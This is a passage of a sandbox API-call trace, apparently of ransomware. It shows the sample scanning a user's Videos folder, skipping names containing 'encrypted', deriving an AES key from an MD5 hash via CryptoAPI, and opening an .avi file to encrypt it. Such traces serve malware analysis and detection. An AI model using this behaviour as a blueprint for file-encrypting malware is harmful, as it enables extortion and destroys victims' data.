ftCreationTime.dwHighDateTime=0x1d5bd91, ftLastAccessTime.dwLowDateTime=0x65634260, ftLastAccessTime.dwHighDateTime=0x1d5b6d9, ftLastWriteTime.dwLowDateTime=0x65634260, ftLastWriteTime.dwHighDateTime=0x1d5b6d9, nFileSizeHigh=0x0, nFileSizeLow=0x10898, dwReserved0=0x0, dwReserved1=0x777648, cFileName="23efG7fei5t7RrlH_.avi", cAlternateFileName="23EFG7~1.AVI")) returned 0x7c20c0 [0042.806] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="23efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fG7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ei5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RrlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rlH_.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.808] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.809] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.809] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.809] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7389b590, ftCreationTime.dwHighDateTime=0x1d5bd91, ftLastAccessTime.dwLowDateTime=0x65634260, ftLastAccessTime.dwHighDateTime=0x1d5b6d9, ftLastWriteTime.dwLowDateTime=0x65634260, ftLastWriteTime.dwHighDateTime=0x1d5b6d9, nFileSizeHigh=0x0, nFileSizeLow=0x10898, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="23efG7fei5t7RrlH_.avi", cAlternateFileName="23EFG7~1.AVI")) returned 0x7c2100 [0042.809] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.809] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.809] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.810] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.810] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.811] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.811] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.811] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.811] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.811] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.811] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.811] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.811] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0042.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.811] CryptDestroyHash (hHash=0x7c2240) returned 1 [0042.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\23efg7fei5t7rrlh_.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.812] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.812] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0042.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0042.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.814] HeapFree 